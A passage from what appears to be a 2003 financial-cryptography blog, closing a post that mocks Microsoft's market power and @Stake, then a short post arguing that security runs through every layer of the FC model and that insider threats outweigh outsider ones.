    Thankfully, those days are long gone, and IBM has real competitors to protect each and every purchasing IT decision maker against the manipulations of a dominating provider. Yet, Microsoft seems to have blundered into this situation without realising the dangers. It has handed its compeititors a no-risk sales argument, as they will never let anyone forget that Microsoft wields immense power - distorting, damaging, and blind power that can do as much harm to the purchaser as it can do good.

    Not to mention AtStake, who will probably sink into the mire of the old party game: "remember AtStake?" What on earth are people going to say when they hear that AtStake has been hired to work on securing the next generation of Aegis cruisers or the new Total Awareness Solution?

    "Oh, we'll be safe until someone gets fired..."

    "At least anyone who's fired can get a job with El Qaeda..."

    The good news is that if they do go down, at least the employees will have the added benefit of being fired by @Stake.

    I wonder how long it will be before people have forgotten the true pedigree of the phrase "nobody ever got fired for buying IBM?"

    [1] These links have been posted on the cryptography archives:
    bostonherald
    ecommercetimes
    mgnetwork

    Posted by iang at 08:19 PM | Comments (2) | TrackBack

    September 16, 2003

    The Insecurity of FC

    Why is there no layer for Security in FC?

    (Actually, I get this from time to time. "Why no X? ?!?" It takes a while to develop the answer for each one. This one is about security, but I've also been asked about Law and Economics.)

    Security is all pervasive. It is not an add on. It is a requirement built in from the beginning and it infects all modules.

    Thus, it is not a layer. It applies to all, although, more particularly, Security will be more present in the lower layers.

    Well, perhaps that is not true. It could be said that Security divides into internal and external threats, and the lower layers are more normally about external threats. The Accounting and Governance layers are more normally concerned with the insider threat.

    Superficially, security appears to be lower in the stack. But, a true security person recognises that an internal threat is more damning, more dangerous, and more frequent in reality than an external threat. In fact, real security work is often more about insider threats than outsider threats.

    So, it's not even possible to be vaguely narrow about Security. Even the upper layers, Finance and Vaue, are critical, as you can't do much security until you understand the application that you are protecting and its concommitant values.

    Posted by iang at 11:56 AM | Comments (2) | TrackBack